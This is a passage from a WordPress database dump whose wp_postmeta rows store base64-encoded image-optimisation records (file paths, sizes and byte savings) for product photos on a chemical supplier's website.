bGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTA0NSwidGltZSI6MTQ4MzU1MTM0NiwiaWQiOjE5MjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU0NiwidGltZSI6MTQ4MzU1MTM0OSwiaWQiOjE5MjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY5NCwidGltZSI6MTQ4MzU1MTM1MiwiaWQiOjE5MjZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28980, 1925, 'wpfc_optimisation_reduction', '28151'); 
INSERT INTO `wp_postmeta` VALUES (28981, 1925, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTEzNTcsImlkIjoiMTkyNSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMDY5LCJ0aW1lIjoxNDgzNTUxMzYwLCJpZCI6MTkyNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTEtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTEtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjM1NTIsInRpbWUiOjE0ODM1NTEzNjQsImlkIjoxOTI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MzIxMywidGltZSI6MTQ4MzU1MTM2NywiaWQiOjE5MjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjE0NjE4LCJ0aW1lIjoxNDgzNTUxMzcwLCJpZCI6MTkyNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY0MSwidGltZSI6MTQ4MzU1MTM3NCwiaWQiOjE5MjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzYsInRpbWUiOjE0ODM1NTEzNzcsImlkIjoxOTI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjI1LCJ0aW1lIjoxNDgzNTUxMzgwLCJpZCI6MTkyNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjIxMzUsInRpbWUiOjE0ODM1NTEzODQsImlkIjoxOTI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2NzQsInRpbWUiOjE0ODM1NTEzODcsImlkIjoxOTI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0xLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDg4LCJ0aW1lIjoxNDgzNTUxMzkwLCJpZCI6MTkyNX1d'); 
INSERT INTO `wp_postmeta` VALUES (28982, 1924, 'wpfc_optimisation_reduction', '29167'); 
INSERT INTO `wp_postmeta` VALUES (28983, 1924, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTEzOTUsImlkIjoiMTkyNCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMDc3LCJ0aW1lIjoxNDgzNTUxMzk4LCJpZCI6MTkyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLVJFU0lOLTEtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLVJFU0lOLTEtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLVJFU0lOLTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjM3MDcsInRpbWUiOjE0ODM1NTE0MDEsImlkIjoxOTI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tUkVTSU4tMS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tUkVTSU4tMS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tUkVTSU4tMS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MzI5MywidGltZSI6MTQ4MzU1MTQwNSwiaWQiOjE5MjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tUkVTSU4tMS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjE0OTM0LCJ0aW1lIjoxNDgzNTUxNDA4LCJpZCI6MTkyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLVJFU0lOLTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLVJFU0lOLTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLVJFU0lOLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY3MSwidGltZSI6MTQ4MzU1MTQxMSwiaWQiOjE5MjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1NjQsInRpbWUiOjE0ODM1NTE0MTUsImlkIjoxOTI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tUkVTSU4tMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tUkVTSU4tMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tUkVTSU4tMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjUwLCJ0aW1lIjoxNDgzNTUxNDE4LCJpZCI6MTkyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLVJFU0lOLTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLVJFU0lOLTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLVJFU0lOLTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjI0MDEsInRpbWUiOjE0ODM1NTE0MjEsImlkIjoxOTI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo3MjIsInRpbWUiOjE0ODM1NTE0MjUsImlkIjoxOTI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1SRVNJTi0xLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMTQ4LCJ0aW1lIjoxNDgzNTUxNDI4LCJpZCI6MTkyNH1d'); 
INSERT INTO `wp_postmeta` VALUES (28984, 1923, 'wpfc_optimisation_reduction', '1209336'); 
INSERT INTO `wp_postmeta` VALUES (28985, 1923, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1yYWRpY2FsLWludGlhdG9yLTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLXJhZGljYWwtaW50aWF0b3ItMi5qcGciLCJ3aWR0aCI6NTkwNSwiaGVpZ2h0Ijo1OTA1LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmF6by1yYWRpY2FsLWludGlhdG9yLTIuanBnIiwicmVkdWN0aW9uIjoxMjA5MzM1LCJ0aW1lIjoxNDgzNTUxNDQwLCJpZCI6IjE5MjMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tcmFkaWNhbC1pbnRpYXRvci0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1yYWRpY2FsLWludGlhdG9yLTItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WYXpvLXJhZGljYWwtaW50aWF0b3ItMi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTQ0MywiaWQiOjE5MjN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28986, 1922, 'wpfc_optimisation_reduction', '1243041'); 
